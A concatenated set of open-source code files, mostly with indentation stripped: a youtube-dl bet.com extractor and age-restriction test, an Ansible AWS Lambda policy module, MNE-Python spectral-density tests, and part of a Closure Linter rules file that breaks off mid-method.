from .mtv import MTVServicesInfoExtractor
from ..utils import unified_strdate
class BetIE(MTVServicesInfoExtractor):
_VALID_URL = r'https?://(?:www\.)?bet\.com/(?:[^/]+/)+(?P<id>.+?)\.html'
_TESTS = [
{
'url': 'http://www.bet.com/news/politics/2014/12/08/in-bet-exclusive-obama-talks-race-and-racism.html',
'info_dict': {
'id': '07e96bd3-8850-3051-b856-271b457f0ab8',
'display_id': 'in-bet-exclusive-obama-talks-race-and-racism',
'ext': 'flv',
'title': 'A Conversation With President Obama',
'description': 'President Obama urges persistence in confronting racism and bias.',
'duration': 1534,
'upload_date': '20141208',
'thumbnail': r're:(?i)^https?://.*\.jpg$',
'subtitles': {
'en': 'mincount:2',
}
},
'params': {
# rtmp download
'skip_download': True,
},
},
{
'url': 'http://www.bet.com/video/news/national/2014/justice-for-ferguson-a-community-reacts.html',
'info_dict': {
'id': '9f516bf1-7543-39c4-8076-dd441b459ba9',
'display_id': 'justice-for-ferguson-a-community-reacts',
'ext': 'flv',
'title': 'Justice for Ferguson: A Community Reacts',
'description': 'A BET News special.',
'duration': 1696,
'upload_date': '20141125',
'thumbnail': r're:(?i)^https?://.*\.jpg$',
'subtitles': {
'en': 'mincount:2',
}
},
'params': {
# rtmp download
'skip_download': True,
},
}
]
_FEED_URL = "http://feeds.mtvnservices.com/od/feed/bet-mrss-player"
def _get_feed_query(self, uri):
return {
'uuid': uri,
}
def _extract_mgid(self, webpage):
return self._search_regex(r'data-uri="([^"]+)', webpage, 'mgid')
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
mgid = self._extract_mgid(webpage)
videos_info = self._get_videos_info(mgid)
info_dict = videos_info['entries'][0]
upload_date = unified_strdate(self._html_search_meta('date', webpage))
description = self._html_search_meta('description', webpage)
info_dict.update({
'display_id': display_id,
'description': description,
'upload_date': upload_date,
})
return info_dict
|
unlicense
|
Facetracker-project/facetracker-core
|
lib/youtube-dl/test/test_age_restriction.py
|
171
|
1379
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import try_rm
from youtube_dl import YoutubeDL
def _download_restricted(url, filename, age):
""" Returns true if the file has been downloaded """
params = {
'age_limit': age,
'skip_download': True,
'writeinfojson': True,
'outtmpl': '%(id)s.%(ext)s',
}
ydl = YoutubeDL(params)
ydl.add_default_info_extractors()
json_filename = os.path.splitext(filename)[0] + '.info.json'
try_rm(json_filename)
ydl.download([url])
res = os.path.exists(json_filename)
try_rm(json_filename)
return res
class TestAgeRestriction(unittest.TestCase):
def _assert_restricted(self, url, filename, age, old_age=None):
self.assertTrue(_download_restricted(url, filename, old_age))
self.assertFalse(_download_restricted(url, filename, age))
def test_youtube(self):
self._assert_restricted('07FYdnEawAQ', '07FYdnEawAQ.mp4', 10)
def test_youporn(self):
self._assert_restricted(
'http://www.youporn.com/watch/505835/sex-ed-is-it-safe-to-masturbate-daily/',
'505835.mp4', 2, old_age=25)
if __name__ == '__main__':
unittest.main()
|
gpl-2.0
|
kbrebanov/ansible
|
lib/ansible/modules/cloud/amazon/lambda_policy.py
|
7
|
13778
|
#!/usr/bin/python
# Copyright (c) 2016, Pierre Jodouin <pjodouin@virtualcomputing.solutions>
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: lambda_policy
short_description: Creates, updates or deletes AWS Lambda policy statements.
description:
- This module allows the management of AWS Lambda policy statements.
It is idempotent and supports "Check" mode. Use module M(lambda) to manage the lambda
function itself, M(lambda_alias) to manage function aliases, M(lambda_event) to manage event source mappings
such as Kinesis streams, M(lambda_invoke) to execute a lambda function and M(lambda_facts) to gather facts
relating to one or more lambda functions.
version_added: "2.4"
author:
- Pierre Jodouin (@pjodouin)
- Michael De La Rue (@mikedlr)
options:
function_name:
description:
- "Name of the Lambda function whose resource policy you are updating by adding a new permission."
- "You can specify a function name (for example, Thumbnail ) or you can specify Amazon Resource Name (ARN) of the"
- "function (for example, arn:aws:lambda:us-west-2:account-id:function:ThumbNail ). AWS Lambda also allows you to"
- "specify partial ARN (for example, account-id:Thumbnail ). Note that the length constraint applies only to the"
- "ARN. If you specify only the function name, it is limited to 64 character in length."
required: true
aliases: ['lambda_function_arn', 'function_arn']
state:
description:
- Describes the desired state.
    required: false
default: "present"
choices: ["present", "absent"]
alias:
description:
- Name of the function alias. Mutually exclusive with C(version).
version:
description:
- Version of the Lambda function. Mutually exclusive with C(alias).
statement_id:
description:
- A unique statement identifier.
required: true
aliases: ['sid']
action:
description:
- "The AWS Lambda action you want to allow in this statement. Each Lambda action is a string starting with
lambda: followed by the API name (see Operations ). For example, lambda:CreateFunction . You can use wildcard
(lambda:* ) to grant permission for all AWS Lambda actions."
required: true
principal:
description:
- "The principal who is getting this permission. It can be Amazon S3 service Principal (s3.amazonaws.com ) if
you want Amazon S3 to invoke the function, an AWS account ID if you are granting cross-account permission, or
any valid AWS service principal such as sns.amazonaws.com . For example, you might want to allow a custom
application in another AWS account to push events to AWS Lambda by invoking your function."
required: true
source_arn:
description:
- This is optional; however, when granting Amazon S3 permission to invoke your function, you should specify this
field with the bucket Amazon Resource Name (ARN) as its value. This ensures that only events generated from
the specified bucket can invoke the function.
source_account:
description:
- The AWS account ID (without a hyphen) of the source owner. For example, if the SourceArn identifies a bucket,
then this is the bucket owner's account ID. You can use this additional condition to ensure the bucket you
specify is owned by a specific account (it is possible the bucket owner deleted the bucket and some other AWS
account created the bucket). You can also use this condition to specify all sources (that is, you don't
specify the SourceArn ) owned by a specific account.
event_source_token:
description:
- Token string representing source ARN or account. Mutually exclusive with C(source_arn) or C(source_account).
requirements:
- boto3
extends_documentation_fragment:
- aws
'''
EXAMPLES = '''
---
- hosts: localhost
gather_facts: no
vars:
state: present
tasks:
- name: Lambda S3 event notification
lambda_policy:
state: "{{ state | default('present') }}"
function_name: functionName
alias: Dev
statement_id: lambda-s3-myBucket-create-data-log
action: lambda:InvokeFunction
principal: s3.amazonaws.com
source_arn: arn:aws:s3:eu-central-1:123456789012:bucketName
source_account: 123456789012
- name: show results
debug: var=lambda_policy_action
'''
RETURN = '''
---
lambda_policy_action:
description: describes what action was taken
returned: success
type: string
'''
import json
import re
from ansible.module_utils._text import to_native
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import get_aws_connection_info, boto3_conn
try:
from botocore.exceptions import ClientError
except ImportError:
    pass  # will be protected by AnsibleAWSModule
def pc(key):
"""
Changes python key into Pascal case equivalent. For example, 'this_function_name' becomes 'ThisFunctionName'.
:param key:
:return:
"""
return "".join([token.capitalize() for token in key.split('_')])
def policy_equal(module, current_statement):
for param in ('action', 'principal', 'source_arn', 'source_account', 'event_source_token'):
if module.params.get(param) != current_statement.get(param):
return False
return True
def set_api_params(module, module_params):
"""
Sets module parameters to those expected by the boto3 API.
:param module:
:param module_params:
:return:
"""
api_params = dict()
for param in module_params:
module_param = module.params.get(param)
if module_param is not None:
api_params[pc(param)] = module_param
return api_params
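# Illustrative sketch with hypothetical values (not taken from the module's
# documentation): given module params {'function_name': 'myFunc',
# 'statement_id': 'sid-1', 'source_arn': None},
# set_api_params(module, ('function_name', 'statement_id', 'source_arn'))
# would return {'FunctionName': 'myFunc', 'StatementId': 'sid-1'} -- unset
# (None) parameters are dropped and keys are Pascal-cased by pc().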
def validate_params(module):
"""
Performs parameter validation beyond the module framework's validation.
:param module:
:return:
"""
function_name = module.params['function_name']
# validate function name
    if function_name.startswith('arn:'):  # full or partial ARN
        if not re.search(r'^[\w\-:]+$', function_name):
            module.fail_json(
                msg='ARN {0} is invalid. ARNs must contain only alphanumeric characters, hyphens and colons.'.format(function_name)
            )
        if len(function_name) > 140:
            module.fail_json(msg='ARN name "{0}" exceeds 140 character limit'.format(function_name))
    else:  # bare function name
        if not re.search(r'^[\w\-]+$', function_name):
            module.fail_json(
                msg='Function name {0} is invalid. Names must contain only alphanumeric characters and hyphens.'.format(
                    function_name)
            )
        if len(function_name) > 64:
            module.fail_json(
                msg='Function name "{0}" exceeds 64 character limit'.format(function_name))
def get_qualifier(module):
"""
Returns the function qualifier as a version or alias or None.
:param module:
:return:
"""
if module.params.get('version') is not None:
return to_native(module.params['version'])
elif module.params['alias']:
return to_native(module.params['alias'])
return None
def extract_statement(policy, sid):
"""return flattened single policy statement from a policy
    If a policy statement is present in the policy, extract it and
return it in a flattened form. Otherwise return an empty
dictionary.
"""
if 'Statement' not in policy:
return {}
policy_statement = {}
# Now that we have the policy, check if required permission statement is present and flatten to
# simple dictionary if found.
for statement in policy['Statement']:
if statement['Sid'] == sid:
policy_statement['action'] = statement['Action']
policy_statement['principal'] = statement['Principal']['Service']
try:
policy_statement['source_arn'] = statement['Condition']['ArnLike']['AWS:SourceArn']
except KeyError:
pass
try:
policy_statement['source_account'] = statement['Condition']['StringEquals']['AWS:SourceAccount']
except KeyError:
pass
try:
policy_statement['event_source_token'] = statement['Condition']['StringEquals']['lambda:EventSourceToken']
except KeyError:
pass
break
return policy_statement
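# Illustrative sketch (hypothetical statement, for orientation only): a policy
# statement such as
#   {'Sid': 'sid-1', 'Action': 'lambda:InvokeFunction',
#    'Principal': {'Service': 's3.amazonaws.com'},
#    'Condition': {'ArnLike': {'AWS:SourceArn': 'arn:aws:s3:::my-bucket'}}}
# would be flattened by extract_statement() to
#   {'action': 'lambda:InvokeFunction', 'principal': 's3.amazonaws.com',
#    'source_arn': 'arn:aws:s3:::my-bucket'}
# which is the shape that policy_equal() compares against module.params.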
def get_policy_statement(module, client):
"""Checks that policy exists and if so, that statement ID is present or absent.
:param module:
:param client:
:return:
"""
policy = dict()
sid = module.params['statement_id']
# set API parameters
api_params = set_api_params(module, ('function_name', ))
qualifier = get_qualifier(module)
if qualifier:
api_params.update(Qualifier=qualifier)
policy_results = None
# check if function policy exists
try:
policy_results = client.get_policy(**api_params)
except ClientError as e:
try:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
return {}
except AttributeError: # catches ClientErrors without response, e.g. fail before connect
pass
module.fail_json_aws(e, msg="retrieving function policy")
except Exception as e:
module.fail_json_aws(e, msg="retrieving function policy")
# get_policy returns a JSON string so must convert to dict before reassigning to its key
policy = json.loads(policy_results.get('Policy', '{}'))
return extract_statement(policy, sid)
def add_policy_permission(module, client):
"""
Adds a permission statement to the policy.
:param module:
    :param client:
:return:
"""
changed = False
# set API parameters
params = (
'function_name',
'statement_id',
'action',
'principal',
'source_arn',
'source_account',
'event_source_token')
api_params = set_api_params(module, params)
qualifier = get_qualifier(module)
if qualifier:
api_params.update(Qualifier=qualifier)
if not module.check_mode:
try:
client.add_permission(**api_params)
except Exception as e:
module.fail_json_aws(e, msg="adding permission to policy")
changed = True
return changed
def remove_policy_permission(module, client):
"""
    Removes a permission statement from the policy.
    :param module:
    :param client:
:return:
"""
changed = False
# set API parameters
api_params = set_api_params(module, ('function_name', 'statement_id'))
qualifier = get_qualifier(module)
if qualifier:
api_params.update(Qualifier=qualifier)
try:
if not module.check_mode:
client.remove_permission(**api_params)
changed = True
except Exception as e:
module.fail_json_aws(e, msg="removing permission from policy")
return changed
def manage_state(module, lambda_client):
changed = False
current_state = 'absent'
state = module.params['state']
action_taken = 'none'
# check if the policy exists
current_policy_statement = get_policy_statement(module, lambda_client)
if current_policy_statement:
current_state = 'present'
if state == 'present':
if current_state == 'present' and not policy_equal(module, current_policy_statement):
remove_policy_permission(module, lambda_client)
changed = add_policy_permission(module, lambda_client)
action_taken = 'updated'
if not current_state == 'present':
changed = add_policy_permission(module, lambda_client)
action_taken = 'added'
elif current_state == 'present':
# remove the policy statement
changed = remove_policy_permission(module, lambda_client)
action_taken = 'deleted'
return dict(changed=changed, ansible_facts=dict(lambda_policy_action=action_taken))
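# Added summary of the state handling above: an existing statement that
# differs from the requested one is removed and re-added ('updated'), a
# missing statement is created ('added'), and with state=absent an existing
# statement is removed ('deleted'); otherwise nothing changes and the
# reported action is 'none'.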
def setup_client(module):
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='lambda', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
return connection
def setup_module_object():
argument_spec = dict(
state=dict(default='present', choices=['present', 'absent']),
function_name=dict(required=True, aliases=['lambda_function_arn', 'function_arn']),
statement_id=dict(required=True, aliases=['sid']),
alias=dict(),
version=dict(type='int'),
action=dict(required=True, ),
principal=dict(required=True, ),
source_arn=dict(),
source_account=dict(),
event_source_token=dict(),
)
return AnsibleAWSModule(
argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[['alias', 'version'],
['event_source_token', 'source_arn'],
['event_source_token', 'source_account']],
)
def main():
"""
Main entry point.
:return dict: ansible facts
"""
module = setup_module_object()
client = setup_client(module)
validate_params(module)
results = manage_state(module, client)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
gpl-3.0
|
nicproulx/mne-python
|
mne/time_frequency/tests/test_psd.py
|
2
|
7360
|
import numpy as np
import os.path as op
from numpy.testing import assert_array_almost_equal, assert_raises
from nose.tools import assert_true
from mne import pick_types, Epochs, read_events
from mne.io import RawArray, read_raw_fif
from mne.utils import requires_version, slow_test, run_tests_if_main
from mne.time_frequency import psd_welch, psd_multitaper
base_dir = op.join(op.dirname(__file__), '..', '..', 'io', 'tests', 'data')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_fname = op.join(base_dir, 'test-eve.fif')
@requires_version('scipy', '0.12')
def test_psd():
"""Tests the welch and multitaper PSD."""
raw = read_raw_fif(raw_fname)
picks_psd = [0, 1]
# Populate raw with sinusoids
rng = np.random.RandomState(40)
data = 0.1 * rng.randn(len(raw.ch_names), raw.n_times)
freqs_sig = [8., 50.]
for ix, freq in zip(picks_psd, freqs_sig):
data[ix, :] += 2 * np.sin(np.pi * 2. * freq * raw.times)
first_samp = raw._first_samps[0]
raw = RawArray(data, raw.info)
tmin, tmax = 0, 20 # use a few seconds of data
fmin, fmax = 2, 70 # look at frequencies between 2 and 70Hz
n_fft = 128
# -- Raw --
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
kws_welch = dict(n_fft=n_fft)
kws_mt = dict(low_bias=True)
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(raw, proj=False, **kws)
psds_proj, freqs_proj = func(raw, proj=True, **kws)
assert_true(psds.shape == (len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Is power found where it should be
ixs_max = np.argmax(psds, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj)
# Array input shouldn't work
assert_raises(ValueError, func, raw[:3, :20][0])
# test n_per_seg in psd_welch (and padding)
psds1, freqs1 = psd_welch(raw, proj=False, n_fft=128, n_per_seg=128,
**kws_psd)
psds2, freqs2 = psd_welch(raw, proj=False, n_fft=256, n_per_seg=128,
**kws_psd)
assert_true(len(freqs1) == np.floor(len(freqs2) / 2.))
assert_true(psds1.shape[-1] == np.floor(psds2.shape[-1] / 2.))
# tests ValueError when n_per_seg=None and n_fft > signal length
kws_psd.update(dict(n_fft=tmax * 1.1 * raw.info['sfreq']))
assert_raises(ValueError, psd_welch, raw, proj=False, n_per_seg=None,
**kws_psd)
# ValueError when n_overlap > n_per_seg
kws_psd.update(dict(n_fft=128, n_per_seg=64, n_overlap=90))
assert_raises(ValueError, psd_welch, raw, proj=False, **kws_psd)
# -- Epochs/Evoked --
events = read_events(event_fname)
events[:, 0] -= first_samp
tmin, tmax, event_id = -0.5, 0.5, 1
epochs = Epochs(raw, events[:10], event_id, tmin, tmax, picks=picks_psd,
proj=False, preload=True, baseline=None)
evoked = epochs.average()
tmin_full, tmax_full = -1, 1
epochs_full = Epochs(raw, events[:10], event_id, tmin_full, tmax_full,
picks=picks_psd, proj=False, preload=True,
baseline=None)
kws_psd = dict(tmin=tmin, tmax=tmax, fmin=fmin, fmax=fmax,
picks=picks_psd) # Common to all
funcs = [(psd_welch, kws_welch),
(psd_multitaper, kws_mt)]
for func, kws in funcs:
kws = kws.copy()
kws.update(kws_psd)
psds, freqs = func(
epochs[:1], proj=False, **kws)
psds_proj, freqs_proj = func(
epochs[:1], proj=True, **kws)
psds_f, freqs_f = func(
epochs_full[:1], proj=False, **kws)
# this one will fail if you add for example 0.1 to tmin
assert_array_almost_equal(psds, psds_f, 27)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds, psds_proj, 27)
# Is power found where it should be
ixs_max = np.argmax(psds.mean(0), axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs))
assert_true(np.abs(ixmax - ixtrue) < 2)
assert_true(psds.shape == (1, len(kws['picks']), len(freqs)))
assert_true(np.sum(freqs < 0) == 0)
assert_true(np.sum(psds < 0) == 0)
# Array input shouldn't work
assert_raises(ValueError, func, epochs.get_data())
# Testing evoked (doesn't work w/ compute_epochs_psd)
psds_ev, freqs_ev = func(
evoked, proj=False, **kws)
psds_ev_proj, freqs_ev_proj = func(
evoked, proj=True, **kws)
# Is power found where it should be
ixs_max = np.argmax(psds_ev, axis=1)
for ixmax, ifreq in zip(ixs_max, freqs_sig):
# Find nearest frequency to the "true" freq
ixtrue = np.argmin(np.abs(ifreq - freqs_ev))
assert_true(np.abs(ixmax - ixtrue) < 2)
# Make sure the projection doesn't change channels it shouldn't
assert_array_almost_equal(psds_ev, psds_ev_proj, 27)
assert_true(psds_ev.shape == (len(kws['picks']), len(freqs)))
@slow_test
@requires_version('scipy', '0.12')
def test_compares_psd():
"""Test PSD estimation on raw for plt.psd and scipy.signal.welch."""
raw = read_raw_fif(raw_fname)
exclude = raw.info['bads'] + ['MEG 2443', 'EEG 053'] # bads + 2 more
# picks MEG gradiometers
picks = pick_types(raw.info, meg='grad', eeg=False, stim=False,
exclude=exclude)[:2]
    tmin, tmax = 0, 10 # use the first 10s of data
    fmin, fmax = 2, 70 # look at frequencies between 2 and 70Hz
n_fft = 2048
# Compute psds with the new implementation using Welch
psds_welch, freqs_welch = psd_welch(raw, tmin=tmin, tmax=tmax, fmin=fmin,
fmax=fmax, proj=False, picks=picks,
n_fft=n_fft, n_jobs=1)
# Compute psds with plt.psd
start, stop = raw.time_as_index([tmin, tmax])
data, times = raw[picks, start:(stop + 1)]
from matplotlib.pyplot import psd
out = [psd(d, Fs=raw.info['sfreq'], NFFT=n_fft) for d in data]
freqs_mpl = out[0][1]
psds_mpl = np.array([o[0] for o in out])
mask = (freqs_mpl >= fmin) & (freqs_mpl <= fmax)
freqs_mpl = freqs_mpl[mask]
psds_mpl = psds_mpl[:, mask]
assert_array_almost_equal(psds_welch, psds_mpl)
assert_array_almost_equal(freqs_welch, freqs_mpl)
assert_true(psds_welch.shape == (len(picks), len(freqs_welch)))
assert_true(psds_mpl.shape == (len(picks), len(freqs_mpl)))
assert_true(np.sum(freqs_welch < 0) == 0)
assert_true(np.sum(freqs_mpl < 0) == 0)
assert_true(np.sum(psds_welch < 0) == 0)
assert_true(np.sum(psds_mpl < 0) == 0)
run_tests_if_main()
|
bsd-3-clause
|
ThirdProject/android_external_chromium_org
|
third_party/closure_linter/closure_linter/javascriptlintrules.py
|
108
|
23113
|
#!/usr/bin/env python
#
# Copyright 2011 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods for checking JS files for common style guide violations.
These style guide violations should only apply to JavaScript, not to all Ecma
scripting languages.
"""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)',
'jacobr@google.com (Jacob Richman)')
import re
from sets import Set
from closure_linter import ecmalintrules
from closure_linter import error_check
from closure_linter import errors
from closure_linter import javascripttokenizer
from closure_linter import javascripttokens
from closure_linter import requireprovidesorter
from closure_linter import tokenutil
from closure_linter.common import error
from closure_linter.common import position
# Shorthand
Error = error.Error
Position = position.Position
Rule = error_check.Rule
Type = javascripttokens.JavaScriptTokenType
class JavaScriptLintRules(ecmalintrules.EcmaScriptLintRules):
"""JavaScript lint rules that catch JavaScript specific style errors."""
def __init__(self, namespaces_info):
"""Initializes a JavaScriptLintRules instance."""
ecmalintrules.EcmaScriptLintRules.__init__(self)
self._namespaces_info = namespaces_info
self._declared_private_member_tokens = {}
self._declared_private_members = Set()
self._used_private_members = Set()
def HandleMissingParameterDoc(self, token, param_name):
"""Handle errors associated with a parameter missing a param tag."""
self._HandleError(errors.MISSING_PARAMETER_DOCUMENTATION,
'Missing docs for parameter: "%s"' % param_name, token)
def __ContainsRecordType(self, token):
"""Check whether the given token contains a record type.
Args:
token: The token being checked
Returns:
True if the token contains a record type, False otherwise.
"""
# If we see more than one left-brace in the string of an annotation token,
# then there's a record type in there.
return (
token and token.type == Type.DOC_FLAG and
token.attached_object.type is not None and
token.attached_object.type.find('{') != token.string.rfind('{'))
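  # Added commentary (hypothetical example): in an annotation string such as
  # "@param {{name: string}} person" the opening brace of the type and the
  # last brace of the token string resolve to different offsets, which is the
  # "more than one left-brace" heuristic used above; CheckToken then
  # invalidates the doc comment instead of emitting warnings for it.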
def CheckToken(self, token, state):
"""Checks a token, given the current parser_state, for warnings and errors.
Args:
token: The current token under consideration
state: parser_state object that indicates the current state in the page
"""
if self.__ContainsRecordType(token):
# We should bail out and not emit any warnings for this annotation.
# TODO(nicksantos): Support record types for real.
state.GetDocComment().Invalidate()
return
# Call the base class's CheckToken function.
super(JavaScriptLintRules, self).CheckToken(token, state)
# Store some convenience variables
namespaces_info = self._namespaces_info
if error_check.ShouldCheck(Rule.UNUSED_PRIVATE_MEMBERS):
# Find all assignments to private members.
if token.type == Type.SIMPLE_LVALUE:
identifier = token.string
if identifier.endswith('_') and not identifier.endswith('__'):
doc_comment = state.GetDocComment()
suppressed = (doc_comment and doc_comment.HasFlag('suppress') and
doc_comment.GetFlag('suppress').type == 'underscore')
if not suppressed:
# Look for static members defined on a provided namespace.
namespace = namespaces_info.GetClosurizedNamespace(identifier)
provided_namespaces = namespaces_info.GetProvidedNamespaces()
# Skip cases of this.something_.somethingElse_.
regex = re.compile('^this\.[a-zA-Z_]+$')
if namespace in provided_namespaces or regex.match(identifier):
variable = identifier.split('.')[-1]
self._declared_private_member_tokens[variable] = token
self._declared_private_members.add(variable)
elif not identifier.endswith('__'):
# Consider setting public members of private members to be a usage.
for piece in identifier.split('.'):
if piece.endswith('_'):
self._used_private_members.add(piece)
# Find all usages of private members.
if token.type == Type.IDENTIFIER:
for piece in token.string.split('.'):
if piece.endswith('_'):
self._used_private_members.add(piece)
if token.type == Type.DOC_FLAG:
flag = token.attached_object
if flag.flag_type == 'param' and flag.name_token is not None:
self._CheckForMissingSpaceBeforeToken(
token.attached_object.name_token)
if (error_check.ShouldCheck(Rule.OPTIONAL_TYPE_MARKER) and
flag.type is not None and flag.name is not None):
# Check for optional marker in type.
if (flag.type.endswith('=') and
not flag.name.startswith('opt_')):
self._HandleError(errors.JSDOC_MISSING_OPTIONAL_PREFIX,
'Optional parameter name %s must be prefixed '
'with opt_.' % flag.name,
token)
elif (not flag.type.endswith('=') and
flag.name.startswith('opt_')):
self._HandleError(errors.JSDOC_MISSING_OPTIONAL_TYPE,
'Optional parameter %s type must end with =.' %
flag.name,
token)
if flag.flag_type in state.GetDocFlag().HAS_TYPE:
# Check for both missing type token and empty type braces '{}'
# Missing suppress types are reported separately and we allow enums
# without types.
if (flag.flag_type not in ('suppress', 'enum') and
(not flag.type or flag.type.isspace())):
self._HandleError(errors.MISSING_JSDOC_TAG_TYPE,
'Missing type in %s tag' % token.string, token)
elif flag.name_token and flag.type_end_token and tokenutil.Compare(
flag.type_end_token, flag.name_token) > 0:
self._HandleError(
errors.OUT_OF_ORDER_JSDOC_TAG_TYPE,
'Type should be immediately after %s tag' % token.string,
token)
elif token.type == Type.DOUBLE_QUOTE_STRING_START:
next_token = token.next
while next_token.type == Type.STRING_TEXT:
if javascripttokenizer.JavaScriptTokenizer.SINGLE_QUOTE.search(
next_token.string):
break
next_token = next_token.next
else:
self._HandleError(
errors.UNNECESSARY_DOUBLE_QUOTED_STRING,
'Single-quoted string preferred over double-quoted string.',
token,
Position.All(token.string))
elif token.type == Type.END_DOC_COMMENT:
doc_comment = state.GetDocComment()
# When @externs appears in a @fileoverview comment, it should trigger
# the same limited doc checks as a special filename like externs.js.
if doc_comment.HasFlag('fileoverview') and doc_comment.HasFlag('externs'):
self._SetLimitedDocChecks(True)
if (error_check.ShouldCheck(Rule.BLANK_LINES_AT_TOP_LEVEL) and
not self._is_html and state.InTopLevel() and not state.InBlock()):
# Check if we're in a fileoverview or constructor JsDoc.
is_constructor = (
doc_comment.HasFlag('constructor') or
doc_comment.HasFlag('interface'))
is_file_overview = doc_comment.HasFlag('fileoverview')
# If the comment is not a file overview, and it does not immediately
# precede some code, skip it.
# NOTE: The tokenutil methods are not used here because of their
# behavior at the top of a file.
next_token = token.next
if (not next_token or
(not is_file_overview and next_token.type in Type.NON_CODE_TYPES)):
return
# Don't require extra blank lines around suppression of extra
# goog.require errors.
if (doc_comment.SuppressionOnly() and
next_token.type == Type.IDENTIFIER and
next_token.string in ['goog.provide', 'goog.require']):
return
# Find the start of this block (include comments above the block, unless
# this is a file overview).
block_start = doc_comment.start_token
if not is_file_overview:
token = block_start.previous
while token and token.type in Type.COMMENT_TYPES:
block_start = token
token = token.previous
# Count the number of blank lines before this block.
blank_lines = 0
token = block_start.previous
while token and token.type in [Type.WHITESPACE, Type.BLANK_LINE]:
if token.type == Type.BLANK_LINE:
# A blank line.
blank_lines += 1
elif token.type == Type.WHITESPACE and not token.line.strip():
# A line with only whitespace on it.
blank_lines += 1
token = token.previous
# Log errors.
error_message = False
expected_blank_lines = 0
if is_file_overview and blank_lines == 0:
error_message = 'Should have a blank line before a file overview.'
expected_blank_lines = 1
elif is_constructor and blank_lines != 3:
error_message = (
'Should have 3 blank lines before a constructor/interface.')
expected_blank_lines = 3
elif not is_file_overview and not is_constructor and blank_lines != 2:
error_message = 'Should have 2 blank lines between top-level blocks.'
expected_blank_lines = 2
if error_message:
self._HandleError(
errors.WRONG_BLANK_LINE_COUNT, error_message,
block_start, Position.AtBeginning(),
expected_blank_lines - blank_lines)
elif token.type == Type.END_BLOCK:
if state.InFunction() and state.IsFunctionClose():
is_immediately_called = (token.next and
token.next.type == Type.START_PAREN)
function = state.GetFunction()
if not self._limited_doc_checks:
if (function.has_return and function.doc and
not is_immediately_called and
not function.doc.HasFlag('return') and
not function.doc.InheritsDocumentation() and
not function.doc.HasFlag('constructor')):
# Check for proper documentation of return value.
self._HandleError(
errors.MISSING_RETURN_DOCUMENTATION,
'Missing @return JsDoc in function with non-trivial return',
function.doc.end_token, Position.AtBeginning())
elif (not function.has_return and
not function.has_throw and
function.doc and
function.doc.HasFlag('return') and
not state.InInterfaceMethod()):
return_flag = function.doc.GetFlag('return')
if (return_flag.type is None or (
'undefined' not in return_flag.type and
'void' not in return_flag.type and
'*' not in return_flag.type)):
self._HandleError(
errors.UNNECESSARY_RETURN_DOCUMENTATION,
'Found @return JsDoc on function that returns nothing',
return_flag.flag_token, Position.AtBeginning())
if state.InFunction() and state.IsFunctionClose():
is_immediately_called = (token.next and
token.next.type == Type.START_PAREN)
if (function.has_this and function.doc and
not function.doc.HasFlag('this') and
not function.is_constructor and
not function.is_interface and
'.prototype.' not in function.name):
self._HandleError(
errors.MISSING_JSDOC_TAG_THIS,
'Missing @this JsDoc in function referencing "this". ('
'this usually means you are trying to reference "this" in '
'a static function, or you have forgotten to mark a '
'constructor with @constructor)',
function.doc.end_token, Position.AtBeginning())
elif token.type == Type.IDENTIFIER:
if token.string == 'goog.inherits' and not state.InFunction():
if state.GetLastNonSpaceToken().line_number == token.line_number:
self._HandleError(
errors.MISSING_LINE,
'Missing newline between constructor and goog.inherits',
token,
Position.AtBeginning())
extra_space = state.GetLastNonSpaceToken().next
while extra_space != token:
if extra_space.type == Type.BLANK_LINE:
self._HandleError(
errors.EXTRA_LINE,
'Extra line between constructor and goog.inherits',
extra_space)
extra_space = extra_space.next
# TODO(robbyw): Test the last function was a constructor.
# TODO(robbyw): Test correct @extends and @implements documentation.
elif (token.string == 'goog.provide' and
not state.InFunction() and
namespaces_info is not None):
namespace = tokenutil.Search(token, Type.STRING_TEXT).string
# Report extra goog.provide statement.
if namespaces_info.IsExtraProvide(token):
self._HandleError(
errors.EXTRA_GOOG_PROVIDE,
'Unnecessary goog.provide: ' + namespace,
token, position=Position.AtBeginning())
if namespaces_info.IsLastProvide(token):
# Report missing provide statements after the last existing provide.
missing_provides = namespaces_info.GetMissingProvides()
if missing_provides:
self._ReportMissingProvides(
missing_provides,
tokenutil.GetLastTokenInSameLine(token).next,
False)
